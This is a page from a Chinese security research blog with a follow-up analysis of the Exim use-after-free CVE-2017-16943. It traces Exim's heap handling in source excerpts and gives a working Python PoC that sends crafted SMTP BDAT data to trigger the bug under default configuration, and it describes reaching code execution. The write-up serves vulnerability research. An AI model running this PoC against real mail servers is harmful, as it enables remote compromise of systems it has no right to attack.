<!DOCTYPE html>
<html lang="default">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <title>CVE-2017-16943 Exim UAF漏洞分析--后续 | Hc1m1</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="上一篇分析出来后，经过@orange的提点，得知了meh公布的PoC是需要特殊配置才能触发，所以我上一篇分析文章最后的结论应该改成，在默认配置情况下，meh提供的PoC无法成功触发uaf漏洞。之后我又对为啥修改了配置后能触发和默认情况下如何触发漏洞进行了研究">
<meta name="keywords" content="bin,research">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2017-16943 Exim UAF漏洞分析--后续">
<meta property="og:url" content="http://0x48.pw/2017/12/08/0x3F/index.html">
<meta property="og:site_name" content="Hc1m1">
<meta property="og:description" content="上一篇分析出来后，经过@orange的提点，得知了meh公布的PoC是需要特殊配置才能触发，所以我上一篇分析文章最后的结论应该改成，在默认配置情况下，meh提供的PoC无法成功触发uaf漏洞。之后我又对为啥修改了配置后能触发和默认情况下如何触发漏洞进行了研究">
<meta property="og:image" content="http://qn.lazysheep.cc/img/exim1.png">
<meta property="og:image" content="http://qn.lazysheep.cc/img/exim2.png">
<meta property="og:updated_time" content="2017-12-13T07:48:51.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2017-16943 Exim UAF漏洞分析--后续">
<meta name="twitter:description" content="上一篇分析出来后，经过@orange的提点，得知了meh公布的PoC是需要特殊配置才能触发，所以我上一篇分析文章最后的结论应该改成，在默认配置情况下，meh提供的PoC无法成功触发uaf漏洞。之后我又对为啥修改了配置后能触发和默认情况下如何触发漏洞进行了研究">
<meta name="twitter:image" content="http://qn.lazysheep.cc/img/exim1.png">
  
    <link rel="alternative" href="/rss.xml" title="Hc1m1" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  
      <link href="//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css" rel="stylesheet">
  
  
      <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
      <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">
  
  <link rel="stylesheet" href="/css/style.css">
  
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
    <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <script src="//cdn.bootcss.com/jquery/1.9.1/jquery.min.js"></script>
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false,
      }
  </script>

  
      <script>
          yiliaConfig.rootUrl = "/";
      </script>
  

  
      <script>
          var _hmt = _hmt || [];
          (function() {
              var hm = document.createElement("script");
              hm.src = "//hm.baidu.com/hm.js?4b6b8b9a09d24f4d4e26c50bd1707fd7";
              var s = document.getElementsByTagName("script")[0]; 
              s.parentNode.insertBefore(hm, s);
          })();
      </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  
</head>
<body>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="http://qn.lazysheep.cc/img/author.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Hcamael</a></h1>
        </hgroup>

        
        <p class="header-subtitle">Blog</p>
        
                


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <li id="Email"><a class="Email" target="_blank" href="mailto: baiyjrh@gmail.com" title="Email"></a></li>
                            
                                <li id="GitHub"><a class="GitHub" target="_blank" href="https://github.com/Hcamael" title="GitHub"></a></li>
                            
                                <li id="RSS"><a class="RSS" target="_blank" href="/rss.xml" title="RSS"></a></li>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 17.5px;">Crypto</a> <a href="/tags/GIT/" style="font-size: 10px;">GIT</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/Pentest/" style="font-size: 10px;">Pentest</a> <a href="/tags/Python/" style="font-size: 13.75px;">Python</a> <a href="/tags/RE/" style="font-size: 12.5px;">RE</a> <a href="/tags/SQLi/" style="font-size: 11.25px;">SQLi</a> <a href="/tags/Web/" style="font-size: 16.25px;">Web</a> <a href="/tags/bin/" style="font-size: 18.75px;">bin</a> <a href="/tags/network/" style="font-size: 10px;">network</a> <a href="/tags/old-blog/" style="font-size: 10px;">old_blog</a> <a href="/tags/php/" style="font-size: 12.5px;">php</a> <a href="/tags/research/" style="font-size: 15px;">research</a> <a href="/tags/sb/" style="font-size: 10px;">sb</a> <a href="/tags/share/" style="font-size: 10px;">share</a> <a href="/tags/随笔/" style="font-size: 10px;">随笔</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://vidar.club">Vidar-Team</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://wiki.vidar.club/doku.php">wiki</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://drops.vidar.club/">Drops</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://lightless.me">lightless</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://homeway.me">夏日小草</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.edwardl.xyz">Edward_L</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://aklis.info">Aklis</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://libc.pw">Explorer</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://lorexxar.cn">Lorexxar</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://misty.moe/">Misty</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.venenof.com/">Veneno</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.wupco.cn">Wupco</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.scanfsec.com">scanf</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://repwn.com">Bird</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://pzhxbz.cn">pzhxbz</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://veritas501.space/">veritas</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">HDUISA, web狗, 菜鸡H, 正在向bin爷爷努力前进</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Hcamael</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="http://qn.lazysheep.cc/img/author.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Hcamael</a></h1>
            </hgroup>
            
            <p class="header-subtitle">Blog</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <li id="Email"><a class="Email" target="_blank" href="mailto: baiyjrh@gmail.com" title="Email"></a></li>
                            
                                <li id="GitHub"><a class="GitHub" target="_blank" href="https://github.com/Hcamael" title="GitHub"></a></li>
                            
                                <li id="RSS"><a class="RSS" target="_blank" href="/rss.xml" title="RSS"></a></li>
                            
                        </ul>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-0x3F" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/12/08/0x3F/" class="article-date">
      <time datetime="2017-12-08T06:15:55.000Z" itemprop="datePublished">2017-12-08</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CVE-2017-16943 Exim UAF漏洞分析--后续
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/bin/">bin</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/research/">research</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p><a href="https://paper.seebug.org/469/" target="_blank" rel="external">上一篇分析</a>出来后，经过@orange的提点，得知了meh公布的PoC是需要特殊配置才能触发，所以我上一篇分析文章最后的结论应该改成，在默认配置情况下，meh提供的PoC无法成功触发uaf漏洞。之后我又对为啥修改了配置后能触发和默认情况下如何触发漏洞进行了研究</p>
<a id="more"></a>
<h1 id="重新复现漏洞"><a href="#重新复现漏洞" class="headerlink" title="重新复现漏洞"></a>重新复现漏洞</h1><p>比上一篇分析中复现的步骤，只需要多一步，注释了<code>/usr/exim/configure</code>文件中的<code>control = dkim_disable_verify</code></p>
<p>然后调整下poc的padding，就可以成功触发UAF漏洞，控制rip</p>
<h2 id="分析特殊配置下的触发流程"><a href="#分析特殊配置下的触发流程" class="headerlink" title="分析特殊配置下的触发流程"></a>分析特殊配置下的触发流程</h2><p>在代码中有一个变量是<code>dkim_disable_verify</code>, 在设置后会变成<code>true</code>，所以注释掉的情况下，就为默认值<code>false</code>, 然后再看看<code>receive.c</code>中的代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="function">BOOL</span></div><div class="line"><span class="title">receive_msg</span><span class="params">(BOOL extract_recip)</span></div><div class="line">&#123;</div><div class="line">......</div><div class="line"><span class="number">1733</span>：<span class="keyword">if</span> (smtp_input &amp;&amp; !smtp_batched_input &amp;&amp; !dkim_disable_verify)</div><div class="line"><span class="number">1734</span>：  dkim_exim_verify_init(chunking_state &lt;= CHUNKING_OFFERED);</div><div class="line"><span class="number">1735</span>：<span class="meta">#<span class="meta-keyword">endif</span></span></div></pre></td></tr></table></figure>
<p>进入了<code>dkim_exim_verify_init</code>函数，之后的大致流程：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">dkim_exim_verify_init -&gt; pdkim_init_verify -&gt; ctx-&gt;linebuf = store_get(PDKIM_MAX_BODY_LINE_LEN);</div><div class="line"></div><div class="line">bdat_getc -&gt; smtp_getc -&gt; smtp_refill -&gt; dkim_exim_verify_feed -&gt; pdkim_feed -&gt; string_catn -&gt; string_get -&gt; store_get(0x64)</div><div class="line"></div><div class="line">#define PDKIM_MAX_BODY_LINE_LEN     16384       //0x4000</div></pre></td></tr></table></figure>
<p>在上一篇文章中说过了，无法成功触发uaf漏洞的原因是，被free的堆处于堆顶，释放后就和top chunk合并了。</p>
<p>在注释了dkim的配置后，在<code>dkim_exim_verify_init</code> 函数的流程中，执行了一个<code>store_get</code> 函数，申请了一个0x4000大小的堆，然后在<code>dkim_exim_verify_init</code> 函数和<code>dkim_exim_verify_feed</code> 函数中，都有如下的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">store_pool = POOL_PERM;</div><div class="line">......</div><div class="line">store_pool = dkim_verify_oldpool;</div><div class="line">---------------</div><div class="line">enum &#123; POOL_MAIN, POOL_PERM, POOL_SEARCH &#125;;</div></pre></td></tr></table></figure>
<p><code>store_pool</code>全局变量被修改为了1，之前说过了，exim自己实现了一套堆管理，当<code>store_pool</code>不同时，相当于对堆进行了隔离，不会影响<code>receive_msg</code> 函数中使用堆管理时的<code>current_block</code>这类的堆管理全局变量</p>
<p>当dkim相关的代码执行结束后，还把<code>store_pool</code>恢复回去了</p>
<p>因为申请了一个0x4000大小的堆，大于0x2000，所以申请之后<code>yield_length</code>全局变量的值变为了0，导致了之后<code>store_get(0x64)</code>再次申请了一块堆，所以有了两块堆放在了heap1的上面，释放heap1后，heap1被放入了unsortbin，成功触发了uaf漏洞，造成crash。(之前的文章中都有写到)</p>
<h2 id="默认配置情况下复现漏洞"><a href="#默认配置情况下复现漏洞" class="headerlink" title="默认配置情况下复现漏洞"></a>默认配置情况下复现漏洞</h2><p>在特殊配置情况下复现了漏洞后，又进行了如果在默认配置情况下触发漏洞的研究。</p>
<p>在@explorer大佬的教导下，发现了一种在默认情况下触发漏洞的情况。</p>
<p>其实触发的关键点，就是想办法在heap1上面再malloc一个堆，现在我们从头来开始分析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">// daemon.c</div><div class="line"></div><div class="line">137 static void</div><div class="line">138 handle_smtp_call(int *listen_sockets, int listen_socket_count,</div><div class="line">139  int accept_socket, struct sockaddr *accepted)</div><div class="line">140 &#123;</div><div class="line">......</div><div class="line">348 pid = fork();</div><div class="line">352 if (pid == 0)</div><div class="line">353   &#123;</div><div class="line">......</div><div class="line">504     if ((rc = smtp_setup_msg()) &gt; 0)</div><div class="line">505       &#123;</div><div class="line">506       BOOL ok = receive_msg(FALSE);</div><div class="line">......</div></pre></td></tr></table></figure>
<p>首先，当有新连接进来的时候，fork一个子进程，然后进入上面代码中的那个分支，<code>smtp_setup_msg</code>函数是用来接收命令的函数，我们先发一堆无效的命令过去(padding)，控制<code>yield_length</code>的值小于0x100，目的上一篇文章说过了，因为命令无效，流程再一次进入了<code>smtp_setup_msg</code></p>
<p>这时候我们发送一个命令<code>BDAT 16356</code></p>
<p>然后有几个比较重要的操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">5085       if (sscanf(CS smtp_cmd_data, &quot;%u %n&quot;, &amp;chunking_datasize, &amp;n) &lt; 1)</div><div class="line">5093       chunking_data_left = chunking_datasize;</div><div class="line">5100       lwr_receive_getc = receive_getc;</div><div class="line">5101       lwr_receive_getbuf = receive_getbuf;</div><div class="line">5102       lwr_receive_ungetc = receive_ungetc;</div><div class="line">5104       receive_getc = bdat_getc;</div><div class="line">5105       receive_ungetc = bdat_ungetc;</div></pre></td></tr></table></figure>
<p>首先是把输入的16356赋值给<code>chunking_data_left</code></p>
<p>然后把<code>receive_getc</code>换成<code>bdat_getc</code>函数</p>
<p>再做完这些的操作后，进入了<code>receive_msg</code>函数，按照上篇文章的流程差不多，显示申请了一个0x100的heap1</p>
<p>然后进入<code>receive_getc=bdat_getc</code>读取数据:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="number">534</span> <span class="keyword">int</span></div><div class="line"><span class="number">535</span> bdat_getc(<span class="keyword">unsigned</span> lim)</div><div class="line"><span class="number">536</span> &#123;</div><div class="line">......</div><div class="line"><span class="number">546</span>   <span class="keyword">if</span> (chunking_data_left &gt; <span class="number">0</span>)</div><div class="line"><span class="number">547</span>     <span class="keyword">return</span> lwr_receive_getc(chunking_data_left--);</div></pre></td></tr></table></figure>
<p><code>lwr_receive_getc=smtp_getc</code>通过该函数获取16356个字符串</p>
<p>首先，我们发送16352个a作为padding，然后执行了下面这流程:</p>
<ul>
<li>store_extend return 0 -&gt; store_get -&gt; store_release</li>
</ul>
<p>先申请了一个0x4010的heap2，然后释放了长度为0x2010的heap1</p>
<p>然后发送<code>:\r\n</code>，进入下面的代码分支:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="number">1902</span>   <span class="keyword">if</span> (ch == <span class="string">'\r'</span>)</div><div class="line"><span class="number">1903</span>     &#123;</div><div class="line"><span class="number">1904</span>     ch = (receive_getc)(GETC_BUFFER_UNLIMITED);</div><div class="line"><span class="number">1905</span>     <span class="keyword">if</span> (ch == <span class="string">'\n'</span>)</div><div class="line"><span class="number">1906</span>       &#123;</div><div class="line"><span class="number">1907</span>       <span class="keyword">if</span> (first_line_ended_crlf == TRUE_UNSET) first_line_ended_crlf = TRUE;</div><div class="line"><span class="number">1908</span>       <span class="keyword">goto</span> EOL;</div><div class="line"><span class="number">1909</span>       &#125;</div></pre></td></tr></table></figure>
<p>跳到了EOL，最重要的是最后几行代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="number">2215</span>   header_size = <span class="number">256</span>;</div><div class="line"><span class="number">2216</span>   next = store_get(<span class="keyword">sizeof</span>(header_line));</div><div class="line"><span class="number">2217</span>   next-&gt;text = store_get(header_size);</div><div class="line"><span class="number">2218</span>   ptr = <span class="number">0</span>;</div><div class="line"><span class="number">2219</span>   had_zero = <span class="number">0</span>;</div><div class="line"><span class="number">2220</span>   prevlines_length = <span class="number">0</span>;</div><div class="line"><span class="number">2221</span>   &#125;      <span class="comment">/* Continue, starting to read the next header */</span></div></pre></td></tr></table></figure>
<p>把一些变量重新进行了初始化，因为之前因为padding执行了<code>store_get(0x4000)</code>，所以这个时候<code>yield_length=0</code> 这个时候再次调用store_get将会申请一个0x2000大小堆，从unsortbin中发现heap1大小正好合适，所以这个时候得到的就是heap1，在heap1的顶上有一个之前<code>next-&gt;text</code>使用，大小0x4010，未释放的堆。</p>
<p>之后流程的原理其实跟之前的差不多，PoC如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">r = remote(<span class="string">'localhost'</span>, <span class="number">25</span>)</div><div class="line"></div><div class="line">r.recvline()</div><div class="line">r.sendline(<span class="string">"EHLO test"</span>)</div><div class="line">r.recvuntil(<span class="string">"250 HELP"</span>)</div><div class="line">r.sendline(<span class="string">"MAIL FROM:&lt;test@localhost&gt;"</span>)</div><div class="line">r.recvline()</div><div class="line">r.sendline(<span class="string">"RCPT TO:&lt;test@localhost&gt;"</span>)</div><div class="line">r.recvline()</div><div class="line"><span class="comment"># raw_input()</span></div><div class="line">r.sendline(<span class="string">'a'</span>*<span class="number">0x1300</span>+<span class="string">'\x7f'</span>)</div><div class="line"><span class="comment"># raw_input()</span></div><div class="line">r.recvuntil(<span class="string">'command'</span>)</div><div class="line">r.sendline(<span class="string">'BDAT 16356'</span>)</div><div class="line">r.sendline(<span class="string">"a"</span>*<span class="number">16352</span>+<span class="string">':\r'</span>)</div><div class="line">r.sendline(<span class="string">'aBDAT \x7f'</span>)</div><div class="line">s = <span class="string">'a'</span>*<span class="number">6</span> + p64(<span class="number">0xabcdef</span>)*(<span class="number">0x1e00</span>/<span class="number">8</span>)</div><div class="line">r.send(s+ <span class="string">':\r\n'</span>)</div><div class="line">r.recvuntil(<span class="string">'command'</span>)</div><div class="line"><span class="comment">#raw_input()</span></div><div class="line">r.send(<span class="string">'\n'</span>)</div></pre></td></tr></table></figure>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>根据该CVE作者发的文章，得知是利用文件IO的fflush来控制第一个参数，然后通过堆喷和内存枚举来来伪造vtable，最后跳转到<code>expand_string</code>函数来执行命令，正好我最近也在研究ctf中的<code>_IO_FILE</code>的相关利用(之后应该会写几篇这方面相关的blog)，然后实现了RCE，结果图如下：</p>
<p><img src="http://qn.lazysheep.cc/img/exim1.png" alt="exim1"></p>
<p><img src="http://qn.lazysheep.cc/img/exim2.png" alt="exim2"></p>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><ol>
<li><a href="https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/" target="_blank" rel="external">https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/</a></li>
</ol>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/12/08/0x3F/">CVE-2017-16943 Exim UAF漏洞分析--后续</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">Hcamael</a></p>
        <p><span>发布时间:</span>2017-12-08, 14:15:55</p>
        <p><span>最后更新:</span>2017-12-13, 15:48:51</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/12/08/0x3F/" title="CVE-2017-16943 Exim UAF漏洞分析--后续">http://0x48.pw/2017/12/08/0x3F/</a>
            <span class="copy-path" data-clipboard-text="原文: http://0x48.pw/2017/12/08/0x3F/　　作者: Hcamael" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="//qn.lazysheep.cc/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2017/12/01/0x3E/">
                    CVE-2017-16943 Exim UAF漏洞分析
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#重新复现漏洞"><span class="toc-number">1.</span> <span class="toc-text">重新复现漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#分析特殊配置下的触发流程"><span class="toc-number">1.1.</span> <span class="toc-text">分析特殊配置下的触发流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#默认配置情况下复现漏洞"><span class="toc-number">1.2.</span> <span class="toc-text">默认配置情况下复现漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">1.3.</span> <span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考链接"><span class="toc-number">2.</span> <span class="toc-text">参考链接</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>

<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }

    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })

    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    




    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2017/12/01/0x3E/" title="下一篇: CVE-2017-16943 Exim UAF漏洞分析">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2017/12/08/0x3F/">CVE-2017-16943 Exim UAF漏洞分析--后续</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/01/0x3E/">CVE-2017-16943 Exim UAF漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/11/0x3D/">CTF PWN题之setbuf的利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/03/0x3C/">看雪CTF 第四题club_pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/30/0x3B/">TP-Link WR941N路由器研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/04/0x3A/">Pwnhub 2013的国庆 writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/0x39/">HITB CTF 2017 Pwn题研究🙉</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/0x38/">Pwnhub之奇妙的巨蟒 Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/07/0x37/">malloc.c源码阅读之__libc_free</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/01/0x36/">堆溢出学习之0CTF 2017 Babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/25/0x35/">glibc malloc学习笔记之fastbin🐦</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/12/0x34/">对虚拟机进行磁盘扩容🐥</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/23/0x33/">ROP小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/05/0x32/">Triton学习笔记(三)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/03/0x31/">Triton学习笔记(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/02/0x30/">Triton学习笔记(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/20/0x2f/">记一次手撸CPython bytecode</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/17/0x2e/">填坑</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/14/0x2d/">栈溢出之绕过CANARY保护</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/13/0x2c/">Linux系统下格式化字符串利用研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/17/0x2b/">Pwnhub之深入敌后writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/06/0x2a/">CVE-2016-6313 随机数预测分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/28/0x29/">phpmailer RCE 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/28/0x28/">2016 HCTF Crypto 出题总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/21/0x27/">PWN学习总结之基础栈溢出2</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/03/0x26/">PWN学习总结之基础栈溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/14/0x24/">HITCON 2016 Web 总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/12/0x23/">2016 HITCON Crypto -- PAKE(++)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/13/0x22/">php bugs 72663分析(CVE-2016-7124)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/31/0x21/">Cisco ASA RCE 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/16/0x20/">LNMP + phpenv 实现不同虚拟主机使用不同版本的PHP</a></li><li class="post-list-item"><a class="post-list-link" 